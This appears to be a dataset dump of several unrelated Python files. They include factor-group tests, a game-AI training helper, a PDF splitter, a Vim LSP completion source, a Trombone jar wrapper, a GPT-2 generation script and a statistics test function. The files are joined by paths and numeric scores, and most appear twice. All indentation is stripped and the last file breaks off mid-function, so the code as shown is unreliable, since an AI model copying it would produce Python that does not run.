[vg[0, 0], vg[0, 1], vg[1, 1]],
[vg[0, 1], vg[1, 0], vg[1, 1]],
],
factor_configs=np.zeros((1, 3), dtype=int),
log_potentials=np.zeros((3, 2)),
)
with pytest.raises(ValueError, match=re.escape("Potentials should be floats")):
enumeration_factor_group = fgroup.EnumFactorGroup(
variables_for_factors=[
[vg[0, 0], vg[0, 1], vg[1, 1]],
[vg[0, 1], vg[1, 0], vg[1, 1]],
],
factor_configs=np.zeros((1, 3), dtype=int),
log_potentials=np.zeros((2, 1), dtype=int),
)
enumeration_factor_group = fgroup.EnumFactorGroup(
variables_for_factors=[
[vg[0, 0], vg[0, 1], vg[1, 1]],
[vg[0, 1], vg[1, 0], vg[1, 1]],
],
factor_configs=np.zeros((1, 3), dtype=int),
)
name = [vg[0, 0], vg[1, 1]]
with pytest.raises(
ValueError,
match=re.escape(
f"The queried factor connected to the set of variables {frozenset(name)} is not present in the factor group."
),
):
enumeration_factor_group[name]
assert (
enumeration_factor_group[[vg[0, 1], vg[1, 0], vg[1, 1]]]
== enumeration_factor_group.factors[1]
)
with pytest.raises(
ValueError,
match=re.escape(
"data should be of shape (2, 1) or (2, 9) or (1,). Got (4, 5)."
),
):
enumeration_factor_group.flatten(np.zeros((4, 5)))
assert jnp.all(enumeration_factor_group.flatten(np.ones(1)) == jnp.ones(2))
assert jnp.all(enumeration_factor_group.flatten(np.ones((2, 9))) == jnp.ones(18))
with pytest.raises(
ValueError, match=re.escape("Can only unflatten 1D array. Got a 3D array.")
):
enumeration_factor_group.unflatten(jnp.ones((1, 2, 3)))
with pytest.raises(
ValueError,
match=re.escape(
"flat_data should be compatible with shape (2, 1) or (2, 9). Got (30,)"
),
):
enumeration_factor_group.unflatten(jnp.zeros(30))
assert jnp.all(
enumeration_factor_group.unflatten(jnp.arange(2)) == jnp.array([[0], [1]])
)
assert jnp.all(enumeration_factor_group.unflatten(jnp.ones(18)) == jnp.ones((2, 9)))
def test_pairwise_factor_group():
vg = vgroup.NDVarArray(shape=(2, 2), num_states=3)
with pytest.raises(
ValueError, match=re.escape("log_potential_matrix should be either a 2D array")
):
fgroup.PairwiseFactorGroup([[vg[0, 0], vg[1, 1]]], np.zeros((1,), dtype=float))
with pytest.raises(
ValueError, match=re.escape("Potential matrix should be floats")
):
fgroup.PairwiseFactorGroup([[vg[0, 0], vg[1, 1]]], np.zeros((3, 3), dtype=int))
with pytest.raises(
ValueError,
match=re.escape(
"Expected log_potential_matrix for 1 factors. Got log_potential_matrix for 2 factors."
),
):
fgroup.PairwiseFactorGroup(
[[vg[0, 0], vg[1, 1]]], np.zeros((2, 3, 3), dtype=float)
)
with pytest.raises(
ValueError,
match=re.escape(
"All pairwise factors should connect to exactly 2 variables. Got a factor connecting to 3 variables"
),
):
fgroup.PairwiseFactorGroup(
[[vg[0, 0], vg[1, 1], vg[0, 1]]], np.zeros((3, 3), dtype=float)
)
name = [vg[0, 0], vg[1, 1]]
with pytest.raises(
ValueError,
match=re.escape(f"The specified pairwise factor {name}"),
):
fgroup.PairwiseFactorGroup([name], np.zeros((4, 4), dtype=float))
pairwise_factor_group = fgroup.PairwiseFactorGroup(
[[vg[0, 0], vg[1, 1]], [vg[1, 0], vg[0, 1]]],
)
with pytest.raises(
ValueError,
match=re.escape(
"data should be of shape (2, 3, 3) or (2, 6) or (3, 3). Got (4, 4)."
),
):
pairwise_factor_group.flatten(np.zeros((4, 4)))
assert jnp.all(
pairwise_factor_group.flatten(np.zeros((3, 3))) == jnp.zeros(2 * 3 * 3)
)
assert jnp.all(pairwise_factor_group.flatten(np.zeros((2, 6))) == jnp.zeros(12))
with pytest.raises(ValueError, match="Can only unflatten 1D array. Got a 2D array"):
pairwise_factor_group.unflatten(np.zeros((10, 20)))
assert jnp.all(
pairwise_factor_group.unflatten(np.zeros(2 * 3 * 3)) == jnp.zeros((2, 3, 3))
)
assert jnp.all(
pairwise_factor_group.unflatten(np.zeros(2 * 6)) == jnp.zeros((2, 6))
)
with pytest.raises(
ValueError,
match=re.escape(
"flat_data should be compatible with shape (2, 3, 3) or (2, 6). Got (10,)."
),
):
pairwise_factor_group.unflatten(np.zeros(10)) | 0.660939 | 0.500183 |
import datetime
from typing import Iterator, Tuple
import os
import secrets
import numpy as np
import tensorflow as tf
import tree
from slippi_ai import data, utils, embed
from slippi_ai.learner import Learner
def get_experiment_tag():
today = datetime.date.today()
return f'{today.year}-{today.month}-{today.day}_{secrets.token_hex(8)}'
def get_experiment_directory():
# create directory for tf checkpoints and other experiment artifacts
expt_dir = f'experiments/{get_experiment_tag()}'
os.makedirs(expt_dir, exist_ok=True)
return expt_dir
# necessary because our dataset has some mismatching types, which ultimately
# come from libmelee occasionally giving differently-typed data
# Won't be necessary if we re-generate the dataset.
embed_game = embed.make_game_embedding()
def sanitize_game(game: data.CompressedGame) -> data.CompressedGame:
"""Casts inputs to the right dtype and discard unused inputs."""
gamestates = embed_game.map(lambda e, a: a.astype(e.dtype), game.states)
return game._replace(states=gamestates)
def sanitize_batch(batch: data.Batch) -> data.Batch:
return batch._replace(game=sanitize_game(batch.game))
class TrainManager:
def __init__(
self,
learner: Learner,
data_source: Iterator[Tuple[data.Batch, float]],
step_kwargs={},
):
self.learner = learner
self.data_source = data_source
self.hidden_state = learner.policy.initial_state(data_source.batch_size)
self.step_kwargs = step_kwargs
self.total_frames = 0
self.data_profiler = utils.Profiler()
self.step_profiler = utils.Profiler()
def step(self) -> dict:
with self.data_profiler:
batch, epoch = next(self.data_source)
batch = sanitize_batch(batch)
with self.step_profiler:
stats, self.hidden_state = self.learner.compiled_step(
batch, self.hidden_state, **self.step_kwargs)
num_frames = np.sum(batch.game.counts + 1)
self.total_frames += num_frames
stats.update(
epoch=epoch,
num_frames=num_frames,
total_frames=self.total_frames,
)
return stats
def log_stats(ex, stats, step=None, sep='.'):
def log(path, value):
if isinstance(value, tf.Tensor):
value = value.numpy()
if isinstance(value, np.ndarray):
value = value.mean()
key = sep.join(map(str, path))
ex.log_scalar(key, value, step=step)
tree.map_structure_with_path(log, stats) | slippi_ai/train_lib.py | import datetime
from typing import Iterator, Tuple
import os
import secrets
import numpy as np
import tensorflow as tf
import tree
from slippi_ai import data, utils, embed
from slippi_ai.learner import Learner
def get_experiment_tag():
today = datetime.date.today()
return f'{today.year}-{today.month}-{today.day}_{secrets.token_hex(8)}'
def get_experiment_directory():
# create directory for tf checkpoints and other experiment artifacts
expt_dir = f'experiments/{get_experiment_tag()}'
os.makedirs(expt_dir, exist_ok=True)
return expt_dir
# necessary because our dataset has some mismatching types, which ultimately
# come from libmelee occasionally giving differently-typed data
# Won't be necessary if we re-generate the dataset.
embed_game = embed.make_game_embedding()
def sanitize_game(game: data.CompressedGame) -> data.CompressedGame:
"""Casts inputs to the right dtype and discard unused inputs."""
gamestates = embed_game.map(lambda e, a: a.astype(e.dtype), game.states)
return game._replace(states=gamestates)
def sanitize_batch(batch: data.Batch) -> data.Batch:
return batch._replace(game=sanitize_game(batch.game))
class TrainManager:
def __init__(
self,
learner: Learner,
data_source: Iterator[Tuple[data.Batch, float]],
step_kwargs={},
):
self.learner = learner
self.data_source = data_source
self.hidden_state = learner.policy.initial_state(data_source.batch_size)
self.step_kwargs = step_kwargs
self.total_frames = 0
self.data_profiler = utils.Profiler()
self.step_profiler = utils.Profiler()
def step(self) -> dict:
with self.data_profiler:
batch, epoch = next(self.data_source)
batch = sanitize_batch(batch)
with self.step_profiler:
stats, self.hidden_state = self.learner.compiled_step(
batch, self.hidden_state, **self.step_kwargs)
num_frames = np.sum(batch.game.counts + 1)
self.total_frames += num_frames
stats.update(
epoch=epoch,
num_frames=num_frames,
total_frames=self.total_frames,
)
return stats
def log_stats(ex, stats, step=None, sep='.'):
def log(path, value):
if isinstance(value, tf.Tensor):
value = value.numpy()
if isinstance(value, np.ndarray):
value = value.mean()
key = sep.join(map(str, path))
ex.log_scalar(key, value, step=step)
tree.map_structure_with_path(log, stats) | 0.801042 | 0.224427 |
__author__ = '<EMAIL> (<NAME>)'
import sys
import os
from CoreGraphics import *
def Usage ():
print """
Usage: splitPDF.py inputFN splitPageNum1 splitPageNum2 ...
- inputFN: the path to the input pdf file.
- splitPageNum1, ...: each one is a positive integer; the numbers
must not exceed the number of pages of the input file, and the
entire sequence must be strictly increasing.
Example: splitPDF.py input.pdf 3 5
This will split file input.pdf into 3 files (assuming input.pdf is 10
pages long):
- input.part1.1_3.pdf contains page 1-3;
- input.part2.4_5.pdf contains page 4-5;
- input.part3.6_10.pdf contains page 6-10.
"""
if len(sys.argv) < 3:
Usage()
sys.exit(1)
else:
inputFN = sys.argv[1]
inputDoc = \
CGPDFDocumentCreateWithProvider(\
CGDataProviderCreateWithFilename(inputFN))
if inputDoc:
maxPages = inputDoc.getNumberOfPages()
print '%s has %d pages' % (inputFN, maxPages)
else:
sys.exit(2)
try:
splitPageNums = map(int, sys.argv[2:])
except:
print 'Error: invalid split page number(s).'
for i, splitPageNum in enumerate(splitPageNums):
if splitPageNum < 1 or splitPageNum > maxPages:
print 'Error: a split page number must be >= 1 and <= %d.' % \
maxPages
sys.exit(3)
elif i and splitPageNums[i - 1] >= splitPageNum:
print 'Error: split page numbers must be increasing.'
sys.exit(4)
baseFN = os.path.splitext(os.path.basename(inputFN))[0]
pageRect = CGRectMake (0, 0, 612, 792)
if splitPageNums[-1] < maxPages:
splitPageNums.append(maxPages)
startPageNum = 1
for i, splitPageNum in enumerate(splitPageNums):
outputFN = '%s.part%d.%d_%d.pdf' % \
(baseFN, i + 1, startPageNum, splitPageNum)
writeContext = CGPDFContextCreateWithFilename(outputFN, pageRect)
print 'Writing page %d-%d to %s...' % \
(startPageNum, splitPageNum, outputFN)
for pageNum in xrange(startPageNum, splitPageNum + 1):
mediaBox = inputDoc.getMediaBox(pageNum)
writeContext.beginPage(mediaBox)
writeContext.drawPDFDocument(mediaBox, inputDoc, pageNum)
writeContext.endPage()
startPageNum = splitPageNum + 1
print 'Done: %d file(s) generated.' % len(splitPageNums) | Python/files/splitPDF.py | __author__ = '<EMAIL> (<NAME>)'
import sys
import os
from CoreGraphics import *
def Usage ():
print """
Usage: splitPDF.py inputFN splitPageNum1 splitPageNum2 ...
- inputFN: the path to the input pdf file.
- splitPageNum1, ...: each one is a positive integer; the numbers
must not exceed the number of pages of the input file, and the
entire sequence must be strictly increasing.
Example: splitPDF.py input.pdf 3 5
This will split file input.pdf into 3 files (assuming input.pdf is 10
pages long):
- input.part1.1_3.pdf contains page 1-3;
- input.part2.4_5.pdf contains page 4-5;
- input.part3.6_10.pdf contains page 6-10.
"""
if len(sys.argv) < 3:
Usage()
sys.exit(1)
else:
inputFN = sys.argv[1]
inputDoc = \
CGPDFDocumentCreateWithProvider(\
CGDataProviderCreateWithFilename(inputFN))
if inputDoc:
maxPages = inputDoc.getNumberOfPages()
print '%s has %d pages' % (inputFN, maxPages)
else:
sys.exit(2)
try:
splitPageNums = map(int, sys.argv[2:])
except:
print 'Error: invalid split page number(s).'
for i, splitPageNum in enumerate(splitPageNums):
if splitPageNum < 1 or splitPageNum > maxPages:
print 'Error: a split page number must be >= 1 and <= %d.' % \
maxPages
sys.exit(3)
elif i and splitPageNums[i - 1] >= splitPageNum:
print 'Error: split page numbers must be increasing.'
sys.exit(4)
baseFN = os.path.splitext(os.path.basename(inputFN))[0]
pageRect = CGRectMake (0, 0, 612, 792)
if splitPageNums[-1] < maxPages:
splitPageNums.append(maxPages)
startPageNum = 1
for i, splitPageNum in enumerate(splitPageNums):
outputFN = '%s.part%d.%d_%d.pdf' % \
(baseFN, i + 1, startPageNum, splitPageNum)
writeContext = CGPDFContextCreateWithFilename(outputFN, pageRect)
print 'Writing page %d-%d to %s...' % \
(startPageNum, splitPageNum, outputFN)
for pageNum in xrange(startPageNum, splitPageNum + 1):
mediaBox = inputDoc.getMediaBox(pageNum)
writeContext.beginPage(mediaBox)
writeContext.drawPDFDocument(mediaBox, inputDoc, pageNum)
writeContext.endPage()
startPageNum = splitPageNum + 1
print 'Done: %d file(s) generated.' % len(splitPageNums) | 0.164752 | 0.261393 |
import re
import time
from deoplete.source.base import Base
LSP_KINDS = [
'Text',
'Method',
'Function',
'Constructor',
'Field',
'Variable',
'Class',
'Interface',
'Module',
'Property',
'Unit',
'Value',
'Enum',
'Keyword',
'Snippet',
'Color',
'File',
'Reference',
'Folder',
'EnumMember',
'Constant',
'Struct',
'Event',
'Operator',
'TypeParameter',
]
class Source(Base):
def __init__(self, vim):
Base.__init__(self, vim)
self.name = 'lsp'
self.mark = '[lsp]'
self.rank = 500
self.is_volatile = True
self.input_pattern = r'[^\w\s]$'
self.events = ['BufEnter']
self.vars = {}
self.vim.vars['deoplete#source#vim_lsp#_results'] = []
self.vim.vars['deoplete#source#vim_lsp#_context'] = {}
self.vim.vars['deoplete#source#vim_lsp#_requested'] = False
self.server_names = None
self.server_capabilities = {}
self.server_infos = {}
self.buf_changed = False
def on_event(self, context):
if context['event'] == 'BufEnter':
self.buf_changed = True
def gather_candidates(self, context):
if not self.server_names or self.buf_changed:
self.server_names = self.vim.call('lsp#get_whitelisted_servers')
self.buf_changed = False
for server_name in self.server_names:
if server_name not in self.server_capabilities:
self.server_capabilities[server_name] = self.vim.call(
'lsp#get_server_capabilities', server_name)
if not self.server_capabilities[server_name].get(
'completionProvider', False):
continue
if self.is_auto_complete():
return self.async_completion(server_name, context)
return self.sync_completion(server_name, context)
return []
def sync_completion(self, server_name, context):
self.request_lsp_completion(server_name, context)
cnt = 0
while True:
cnt += 1
if cnt > 10:
# request timeout
break
if self.vim.vars['deoplete#source#vim_lsp#_requested']:
if match_context(
context,
self.vim.vars['deoplete#source#vim_lsp#_context']
):
return self.process_candidates()
time.sleep(0.01)
return []
def async_completion(self, server_name, context):
if self.vim.vars['deoplete#source#vim_lsp#_requested']:
if match_context(
context,
self.vim.vars['deoplete#source#vim_lsp#_context']
):
return self.process_candidates()
# old position completion
self.request_lsp_completion(server_name, context)
# dissmiss completion
self.request_lsp_completion(server_name, context)
return []
def request_lsp_completion(self, server_name, context):
self.vim.vars['deoplete#source#vim_lsp#_requested'] = False
self.vim.call(
'deoplete_vim_lsp#request',
server_name,
create_option_to_vimlsp(server_name),
create_context_to_vimlsp(context),
)
def process_candidates(self):
candidates = []
results = self.vim.vars['deoplete#source#vim_lsp#_results']
# response is `CompletionList`
if isinstance(results, dict):
if 'items' not in results:
self.print_error(
'LSP results does not have "items" key:{}'.format(
str(results)))
return candidates
items = results['items']
# response is `CompletionItem[]`
elif isinstance(results, list):
items = results
# invalid response
else:
return candidates
if items is None:
return candidates
for rec in items:
if rec.get('insertText', ''):
if rec.get('insertTextFormat', 0) != 1:
word = rec.get('entryName', rec.get('label'))
else:
word = rec['insertText']
else:
word = rec.get('entryName', rec.get('label'))
item = {
'word': re.sub(r'\([^)]*\)', '', word),
'abbr': rec['label'],
'dup': 0,
}
if 'kind' in rec:
item['kind'] = LSP_KINDS[rec['kind'] - 1]
if 'detail' in rec and rec['detail']:
item['info'] = rec['detail']
if self.vim.vars['deoplete#sources#vim_lsp#show_info']:
item['menu'] = rec['detail']
candidates.append(item)
return candidates
def is_auto_complete(self):
return self.vim.call(
'deoplete#custom#_get_option',
'auto_complete',
)
def create_option_to_vimlsp(server_name):
return {'name': 'deoplete_lsp_{}'.format(server_name)}
def create_context_to_vimlsp(context):
return {
'curpos': context['position'],
'lnum': context['position'][1],
'col': context['position'][2],
'bufnr': context['bufnr'],
'changedtick': context['changedtick'],
'typed': context['input'],
'filetype': context['filetype'],
'filepath': context['bufpath']
}
def match_context(deoplete_context, vim_lsp_context):
position_key_deoplete = '{}:{}'.format(
deoplete_context['position'][1],
deoplete_context['position'][2],
)
position_key_lsp = '{}:{}'.format(
vim_lsp_context['lnum'],
vim_lsp_context['col'],
)
if position_key_deoplete == position_key_lsp:
return True
return False | rplugin/python3/deoplete/sources/vim_lsp.py | import re
import time
from deoplete.source.base import Base
LSP_KINDS = [
'Text',
'Method',
'Function',
'Constructor',
'Field',
'Variable',
'Class',
'Interface',
'Module',
'Property',
'Unit',
'Value',
'Enum',
'Keyword',
'Snippet',
'Color',
'File',
'Reference',
'Folder',
'EnumMember',
'Constant',
'Struct',
'Event',
'Operator',
'TypeParameter',
]
class Source(Base):
def __init__(self, vim):
Base.__init__(self, vim)
self.name = 'lsp'
self.mark = '[lsp]'
self.rank = 500
self.is_volatile = True
self.input_pattern = r'[^\w\s]$'
self.events = ['BufEnter']
self.vars = {}
self.vim.vars['deoplete#source#vim_lsp#_results'] = []
self.vim.vars['deoplete#source#vim_lsp#_context'] = {}
self.vim.vars['deoplete#source#vim_lsp#_requested'] = False
self.server_names = None
self.server_capabilities = {}
self.server_infos = {}
self.buf_changed = False
def on_event(self, context):
if context['event'] == 'BufEnter':
self.buf_changed = True
def gather_candidates(self, context):
if not self.server_names or self.buf_changed:
self.server_names = self.vim.call('lsp#get_whitelisted_servers')
self.buf_changed = False
for server_name in self.server_names:
if server_name not in self.server_capabilities:
self.server_capabilities[server_name] = self.vim.call(
'lsp#get_server_capabilities', server_name)
if not self.server_capabilities[server_name].get(
'completionProvider', False):
continue
if self.is_auto_complete():
return self.async_completion(server_name, context)
return self.sync_completion(server_name, context)
return []
def sync_completion(self, server_name, context):
self.request_lsp_completion(server_name, context)
cnt = 0
while True:
cnt += 1
if cnt > 10:
# request timeout
break
if self.vim.vars['deoplete#source#vim_lsp#_requested']:
if match_context(
context,
self.vim.vars['deoplete#source#vim_lsp#_context']
):
return self.process_candidates()
time.sleep(0.01)
return []
def async_completion(self, server_name, context):
if self.vim.vars['deoplete#source#vim_lsp#_requested']:
if match_context(
context,
self.vim.vars['deoplete#source#vim_lsp#_context']
):
return self.process_candidates()
# old position completion
self.request_lsp_completion(server_name, context)
# dissmiss completion
self.request_lsp_completion(server_name, context)
return []
def request_lsp_completion(self, server_name, context):
self.vim.vars['deoplete#source#vim_lsp#_requested'] = False
self.vim.call(
'deoplete_vim_lsp#request',
server_name,
create_option_to_vimlsp(server_name),
create_context_to_vimlsp(context),
)
def process_candidates(self):
candidates = []
results = self.vim.vars['deoplete#source#vim_lsp#_results']
# response is `CompletionList`
if isinstance(results, dict):
if 'items' not in results:
self.print_error(
'LSP results does not have "items" key:{}'.format(
str(results)))
return candidates
items = results['items']
# response is `CompletionItem[]`
elif isinstance(results, list):
items = results
# invalid response
else:
return candidates
if items is None:
return candidates
for rec in items:
if rec.get('insertText', ''):
if rec.get('insertTextFormat', 0) != 1:
word = rec.get('entryName', rec.get('label'))
else:
word = rec['insertText']
else:
word = rec.get('entryName', rec.get('label'))
item = {
'word': re.sub(r'\([^)]*\)', '', word),
'abbr': rec['label'],
'dup': 0,
}
if 'kind' in rec:
item['kind'] = LSP_KINDS[rec['kind'] - 1]
if 'detail' in rec and rec['detail']:
item['info'] = rec['detail']
if self.vim.vars['deoplete#sources#vim_lsp#show_info']:
item['menu'] = rec['detail']
candidates.append(item)
return candidates
def is_auto_complete(self):
return self.vim.call(
'deoplete#custom#_get_option',
'auto_complete',
)
def create_option_to_vimlsp(server_name):
return {'name': 'deoplete_lsp_{}'.format(server_name)}
def create_context_to_vimlsp(context):
return {
'curpos': context['position'],
'lnum': context['position'][1],
'col': context['position'][2],
'bufnr': context['bufnr'],
'changedtick': context['changedtick'],
'typed': context['input'],
'filetype': context['filetype'],
'filepath': context['bufpath']
}
def match_context(deoplete_context, vim_lsp_context):
position_key_deoplete = '{}:{}'.format(
deoplete_context['position'][1],
deoplete_context['position'][2],
)
position_key_lsp = '{}:{}'.format(
vim_lsp_context['lnum'],
vim_lsp_context['col'],
)
if position_key_deoplete == position_key_lsp:
return True
return False | 0.264833 | 0.063308 |
import json
import os
import subprocess
from typing import Dict, List, Optional, Tuple
from .util import download_file
class Trombone:
def __init__(self, jar_path: Optional[str] = None):
if jar_path is None:
jar_path = '/tmp/trombone.jar'
if not os.path.exists(jar_path):
print(f'Downloading Trombone ({jar_path}). This may take some minutes ...')
download_file(
url='https://github.com/ulaval-rs/pytrombone/releases/download/v0.1.3/trombone-5.2.1-with-dependencies.jar',
new_file_name=jar_path
)
print(f'Trombone ({jar_path}) downloaded.')
if not os.path.exists(jar_path):
raise FileNotFoundError(f'pytrombone.jar not found at {jar_path}')
self.jar_path = jar_path
def get_version(self):
output, _ = self.run()
serialized_output = self.serialize_output(output)
return serialized_output
def run(self, key_values: Optional[List[Tuple[str, str]]] = None) -> Tuple[str, str]:
"""Run Trombone with given arguments.
Args:
key_values: List of tuples of (key, value) of arguments to give to the Trombone executable.
Example: [('tool', 'corpus.DocumentSMOGIndex'), ('storage', 'file')]
Returns:
Tuple of (output, error), both in str.
"""
formatted_args = []
if key_values:
formatted_args = [f'{key}={value}' for key, value in key_values]
process = subprocess.Popen(
['java', '-jar', self.jar_path] + formatted_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
stdout, stderr = process.communicate()
return stdout.decode(), stderr.decode()
def serialize_output(self, output: str) -> Dict:
index_where_json_start = 0
for i, c in enumerate(output):
if c == '{':
index_where_json_start = i
break
return json.loads(output[index_where_json_start:]) | pytrombone/wrapper.py | import json
import os
import subprocess
from typing import Dict, List, Optional, Tuple
from .util import download_file
class Trombone:
def __init__(self, jar_path: Optional[str] = None):
if jar_path is None:
jar_path = '/tmp/trombone.jar'
if not os.path.exists(jar_path):
print(f'Downloading Trombone ({jar_path}). This may take some minutes ...')
download_file(
url='https://github.com/ulaval-rs/pytrombone/releases/download/v0.1.3/trombone-5.2.1-with-dependencies.jar',
new_file_name=jar_path
)
print(f'Trombone ({jar_path}) downloaded.')
if not os.path.exists(jar_path):
raise FileNotFoundError(f'pytrombone.jar not found at {jar_path}')
self.jar_path = jar_path
def get_version(self):
output, _ = self.run()
serialized_output = self.serialize_output(output)
return serialized_output
def run(self, key_values: Optional[List[Tuple[str, str]]] = None) -> Tuple[str, str]:
"""Run Trombone with given arguments.
Args:
key_values: List of tuples of (key, value) of arguments to give to the Trombone executable.
Example: [('tool', 'corpus.DocumentSMOGIndex'), ('storage', 'file')]
Returns:
Tuple of (output, error), both in str.
"""
formatted_args = []
if key_values:
formatted_args = [f'{key}={value}' for key, value in key_values]
process = subprocess.Popen(
['java', '-jar', self.jar_path] + formatted_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
stdout, stderr = process.communicate()
return stdout.decode(), stderr.decode()
def serialize_output(self, output: str) -> Dict:
index_where_json_start = 0
for i, c in enumerate(output):
if c == '{':
index_where_json_start = i
break
return json.loads(output[index_where_json_start:]) | 0.68458 | 0.180576 |
from transformers import GPT2Tokenizer, GPT2LMHeadModel
import random
import os
import argparse
def parse_arguments():
"""
Parser.
"""
parser = argparse.ArgumentParser()
parser.add_argument("--model_path",
type=str,
default="belgpt2",
help="Path of the model directory."
)
arguments, _ = parser.parse_known_args()
return arguments
def load_model(model_dir=None):
"""
Loads the saved model from disk if the directory exists.
Otherwise it will download the model and tokenizer from hugging face.
Returns a tuple consisting of `(model,tokenizer)`.
"""
tokenizer = GPT2Tokenizer.from_pretrained(model_dir)
model = GPT2LMHeadModel.from_pretrained(model_dir)
return model, tokenizer
def generate(model, tokenizer, input_text=None, num_samples=1, max_length=100, top_k=50, top_p=0.95):
"""
"""
model.eval()
if input_text:
input_ids = tokenizer.encode(input_text, return_tensors='pt')
output = model.generate(
input_ids = input_ids,
do_sample = True,
top_k = top_k,
max_length = max_length,
top_p = top_p,
num_return_sequences = num_samples
)
else:
output = model.generate(
bos_token_id = random.randint(1,50000),
do_sample = True,
top_k = 50,
max_length = max_length,
top_p = 0.95,
num_return_sequences = num_samples
)
decoded_output = []
for sample in output:
decoded_output.append(tokenizer.decode(sample, skip_special_tokens=True))
return decoded_output
def main(args):
"""
"""
# Ask user to input text.
input_text = input("Enter text: ")
# Load model and tokenizer.
model, tokenizer = load_model(args.model_path)
# Generate text.
decoded_output = generate(model, tokenizer, input_text=input_text)
print(decoded_output)
return
if __name__=="__main__":
args = parse_arguments()
main(args) | scripts/tools/generate_text.py | from transformers import GPT2Tokenizer, GPT2LMHeadModel
import random
import os
import argparse
def parse_arguments():
"""
Parser.
"""
parser = argparse.ArgumentParser()
parser.add_argument("--model_path",
type=str,
default="belgpt2",
help="Path of the model directory."
)
arguments, _ = parser.parse_known_args()
return arguments
def load_model(model_dir=None):
"""
Loads the saved model from disk if the directory exists.
Otherwise it will download the model and tokenizer from hugging face.
Returns a tuple consisting of `(model,tokenizer)`.
"""
tokenizer = GPT2Tokenizer.from_pretrained(model_dir)
model = GPT2LMHeadModel.from_pretrained(model_dir)
return model, tokenizer
def generate(model, tokenizer, input_text=None, num_samples=1, max_length=100, top_k=50, top_p=0.95):
"""
"""
model.eval()
if input_text:
input_ids = tokenizer.encode(input_text, return_tensors='pt')
output = model.generate(
input_ids = input_ids,
do_sample = True,
top_k = top_k,
max_length = max_length,
top_p = top_p,
num_return_sequences = num_samples
)
else:
output = model.generate(
bos_token_id = random.randint(1,50000),
do_sample = True,
top_k = 50,
max_length = max_length,
top_p = 0.95,
num_return_sequences = num_samples
)
decoded_output = []
for sample in output:
decoded_output.append(tokenizer.decode(sample, skip_special_tokens=True))
return decoded_output
def main(args):
"""
"""
# Ask user to input text.
input_text = input("Enter text: ")
# Load model and tokenizer.
model, tokenizer = load_model(args.model_path)
# Generate text.
decoded_output = generate(model, tokenizer, input_text=input_text)
print(decoded_output)
return
if __name__=="__main__":
args = parse_arguments()
main(args) | 0.703142 | 0.252303 |
import pandas as pd
import numpy as np
import math
import scipy.stats as stats
import statsmodels.stats.api as sms
def inter_p_value(p_value):
# interpretation
if p_value >= 0 and p_value < 0.01:
inter_p = 'Overwhelming Evidence'
elif p_value >= 0.01 and p_value < 0.05:
inter_p = 'Strong Evidence'
elif p_value >= 0.05 and p_value < 0.1:
inter_p = 'Weak Evidence'
elif p_value >= .1:
inter_p = 'No Evidence'
return inter_p
def two_population(a, b, alpha=.05, consistency='equal', option='right', show_table=False, stages=[1, 2, 3], show=True, precision=4, matched_pairs=False):
"""
+ [First stage]: F Statistics - consistency: equal, left (1 is more consistent than 2), right (2 is more consistent than 1)
+ [Second stage]: t Test
+ [Third stage]: Confidence Interval
Will return a result_dict regardless of stages.
"""
opt = option.lower()[0]
results = ""
const = consistency.lower()[0]
result_dict = dict()
df_1 = len(a) - 1
df_2 = len(b) - 1
if 1 in stages:
varall = [stats.describe(a).variance,
stats.describe(b).variance]
f_value = varall[0] / varall[1]
result_dict['varall'] = varall
result_dict['f_value'] = f_value
ptmp = stats.f.cdf(f_value, df_1, df_2)
if const == 'e':
if ptmp > 0.5:
ptmp = 1 - ptmp
p_value = ptmp * 2
rej_upper = stats.f.ppf(1 - alpha/2, df_1, df_2)
rej_lower = stats.f.ppf(alpha/2, df_1, df_2)
result_dict['f_rej_upper'] = rej_upper
result_dict['f_rej_lower'] = rej_lower
if f_value < rej_lower or f_value > rej_upper:
flag = True
else:
flag = False
text = 'unequal variances'
else:
rej_upper = stats.f.ppf(1 - alpha, df_1, df_2)
rej_lower = stats.f.ppf(alpha, df_1, df_2)
if const == 'r':
result_dict['f_rej_upper'] = rej_upper
p_value = 1 - ptmp
if f_value > rej_upper:
flag = True
else:
flag = False
text = 'σ_1/σ_2 > 1'
else:
result_dict['f_rej_lower'] = rej_lower
p_value = ptmp
if f_value < rej_lower:
flag = True
else:
flag = False
text = 'σ_1/σ_2 < 1'
result_dict['p_value'] = p_value
results = f""" F Statistics
===================================
F statistic = {f_value:.{precision}f}
p-value = {p_value:.{precision}f} ({inter_p_value(p_value)})
Reject H_0 ({text}) → {flag}
"""
if 2 in stages:
if matched_pairs:
samp_diff = a - b
nobs = samp_diff.shape[0]
df = nobs - 1
tmpdesc = stats.describe(samp_diff)
t_value = tmpdesc.mean / (tmpdesc.variance ** 0.5) * (nobs ** 0.5)
# p-values
ptmp = stats.t.cdf(t_value, df)
if opt == 'r':
text = 'one-tail'
tcv = stats.t.ppf(1 - alpha, df=df)
p_value = 1 - ptmp
elif opt == 'l':
text = 'one-tail'
p_value = ptmp
tcv = stats.t.ppf(alpha, df=df)
else:
text = 'two-tail'
tcv = stats.t.ppf(1 - alpha/2, df=df)
if ptmp > 0.5:
ptmp = 1 - ptmp
p_value = ptmp * 2
flag = p_value < alpha
results += f"""
t Test
===================================
t (Observed value) = {t_value:.{precision}f}
p-value ({text}) = {p_value:.{precision}f} ({inter_p_value(p_value)})
t (Critical, ({text})) = {tcv:.{precision}f}
DF = {(df):.{precision}f}
Reject H_0 → {flag}
"""
result_dict['t_p_value'] = p_value
result_dict['t_critical_value'] = tcv
result_dict['t_observed_value'] = t_value
t_alpha = stats.t.ppf(1 - alpha / 2, df)
std_xbar = (tmpdesc.variance / nobs) ** 0.5
LCL = tmpdesc.mean - t_alpha * std_xbar
UCL = tmpdesc.mean + t_alpha * std_xbar
con_coef = 1 - alpha
conf_interval = [LCL, UCL]
result_dict['conf_interval'] = conf_interval
results += f"""
Confidence Interval
===================================
{con_coef * 100:.1f}% Confidence Interval: [{LCL:.{precision}f}, {UCL:.{precision}f}]
"""
else:
if flag: # True == unequal variance
ttest_result = stats.ttest_ind(a, b, equal_var=False)
t_summary = list(ttest_result)
t_critical_two = stats.t.ppf(1 - alpha/2, df=(df_1 + df_2))
if opt == 'r':
t_critical_one = stats.t.ppf(1 - alpha, df=(df_1 + df_2))
result_dict['t_critical_one'] = t_critical_one
elif opt == 'l':
t_critical_one = stats.t.ppf(alpha, df=(df_1 + df_2))
result_dict['t_critical_one'] = t_critical_one
if opt == 't':
flag = t_summary[1] < alpha
result_dict['t_critical_two'] = t_critical_two
result_dict['t_observed_value'] = t_summary[0]
result_dict['t_p_value'] = t_summary[1]
